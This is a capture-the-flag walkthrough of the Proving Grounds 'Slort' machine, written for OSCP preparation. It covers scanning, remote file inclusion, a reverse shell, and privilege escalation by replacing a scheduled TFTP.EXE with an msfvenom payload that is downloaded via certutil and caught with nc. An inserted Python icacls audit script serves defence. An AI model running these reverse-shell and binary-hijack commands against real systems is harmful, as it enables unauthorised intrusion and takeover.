Proving Grounds: Slort

Today we will take a look at Proving Grounds: Slort. My purpose in sharing this post is to prepare for the OSCP exam. It is also to show you the way if you get stuck. Please try to understand each step and take notes.

21/tcp open ftp FileZilla ftpd 0.9.41 beta
| ftp-syst:
|_ SYST: UNIX emulated by FileZilla
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3306/tcp open mysql?
| fingerprint-strings:
| DNSVersionBindReqTCP, Help, NULL:
|_ Host '' is not allowed to connect to this MariaDB server
4443/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-title: Welcome to XAMPP
|_Requested resource was
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
5040/tcp open unknown
7680/tcp open pando-pub?
8080/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
feroxbuster --url -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.asp,.aspx,.xml

Check the “?page” parameter.


Do a simple RFI check.

Reverse shell

Prepare the payload

Ready. Now let’s run it with curl.

We got the shell.

There is a Backup folder in C:\. Let’s look there.

info.txt shows the command that is executed every 5 minutes.

C:\Backup>more info.txt
more info.txt
Run every 5 minutes:
C:\Backup\TFTP.EXE -i get backup.txt

Let’s check our permissions on the folder. We have permission to write and delete.

PS C:\> icacls Backup
icacls Backup
Backup BUILTIN\Users:(OI)(CI)(F)
NT AUTHORITY\Authenticated Users:(I)(M)
NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M)
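The ACL above is the weakness the rest of the walkthrough relies on: a folder from which a scheduled command runs a binary is writable by every local user. As an added defensive check (not part of the original post), the following Python script parses icacls output and flags entries that grant modify, write or delete rights to broad principals; the sample output is constructed from the listing above plus typical inherited entries, and the parser assumes the queried path is passed in so the path prefix on the first ACE line can be stripped.

```python
"""Audit icacls output for folders that low-privileged principals can modify."""
import re

# Principals that every local user (or every authenticated user) belongs to.
BROAD_PRINCIPALS = {
    r"BUILTIN\Users",
    r"NT AUTHORITY\Authenticated Users",
    "Everyone",
    r"NT AUTHORITY\INTERACTIVE",
}
# Simple and specific icacls rights that allow adding, replacing or deleting files.
WRITE_RIGHTS = {"F", "M", "W", "D", "WD", "AD", "DC", "WDAC", "WO"}
# Inheritance / propagation markers, which are not permissions.
INHERIT_FLAGS = {"OI", "CI", "IO", "NP", "I"}

ACE_RE = re.compile(r"^(?P<principal>.+?):(?P<rights>(?:\([A-Z,]+\))+)\s*$")


def parse_icacls(output: str, path: str) -> list[tuple[str, set[str], bool]]:
    """Return (principal, rights, inherit_only) for each allow ACE in icacls output."""
    aces = []
    for raw in output.splitlines():
        line = raw.strip()
        if line.startswith(path + " "):  # icacls prefixes the first ACE with the queried path
            line = line[len(path) + 1:].strip()
        m = ACE_RE.match(line)
        if not m:  # echoed command, summary line or blank line
            continue
        tokens = {t for grp in re.findall(r"\(([^)]+)\)", m["rights"]) for t in grp.split(",")}
        if "DENY" in tokens:  # deny ACEs do not grant anything
            continue
        aces.append((m["principal"], tokens - INHERIT_FLAGS, "IO" in tokens))
    return aces


def audit_icacls(output: str, path: str) -> list[str]:
    """Describe every ACE that lets a broad principal modify the folder or its children."""
    findings = []
    for principal, rights, inherit_only in parse_icacls(output, path):
        if principal in BROAD_PRINCIPALS and rights & WRITE_RIGHTS:
            scope = "children only" if inherit_only else "folder and children"
            findings.append(f"{principal} can modify {path} ({scope}): {','.join(sorted(rights))}")
    return findings


# Constructed sample: the page's ACL plus typical inherited entries and the summary line.
SAMPLE_OUTPUT = r"""icacls Backup
Backup BUILTIN\Users:(OI)(CI)(F)
       NT AUTHORITY\Authenticated Users:(I)(M)
       NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M)
       NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
       BUILTIN\Administrators:(I)(OI)(CI)(F)
       BUILTIN\Users:(I)(OI)(CI)(RX)
Successfully processed 1 files; Failed processing 0 files"""

if __name__ == "__main__":
    for finding in audit_icacls(SAMPLE_OUTPUT, "Backup"):
        print(finding)
```

Any finding here means a scheduled task or service that launches a binary from that folder can be hijacked by an unprivileged user, so the fix is to restrict the folder to Administrators and SYSTEM or to move the binary out of it.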

I create a payload called TFTP.EXE. I’ll remove the original file and replace it with my own.

└─$ msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=21 -f exe > TFTP.EXE 
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes

Delete the original file.

C:\Backup>del TFTP.EXE

Upload our own file.

C:\Backup>certutil -urlcache -split -f
certutil -urlcache -split -f
**** Online ****
000000 ...
CertUtil: -URLCache command completed successfully.


└─$ sudo nc -nvlp 21 
[sudo] password for kali:
listening on [any] 21 ...
connect to [] from (UNKNOWN) [] 50259
Microsoft Windows [Version 10.0.19042.1387]
(c) Microsoft Corporation. All rights reserved.


And now we are the Administrator.

“If you have any questions or comments, please do not hesitate to write. Have a good day.”



Al1z4deh:~# echo "eJPT, CEH, OSCP"
